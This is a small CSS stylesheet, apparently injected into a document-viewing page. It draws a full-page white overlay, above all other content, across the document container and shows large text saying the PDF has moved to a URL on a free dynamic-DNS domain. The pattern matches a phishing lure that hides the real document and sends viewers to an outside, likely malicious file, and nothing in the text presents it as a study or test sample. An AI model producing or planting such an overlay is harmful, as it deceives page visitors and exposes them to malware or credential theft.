body {
  display: block;
}

.document-content-container::after {
  content: "PDF file moved to https://abze.cloudns.biz/1.pdf";
  display: inline-block;
  position: absolute;
  background-color: white;
  width: 100%;
  height: 100%;
  top: 0;
  left: 0;
  z-index: 999;
  text-align: center;
  font-size: 5em;
  padding-top: 1em;
}
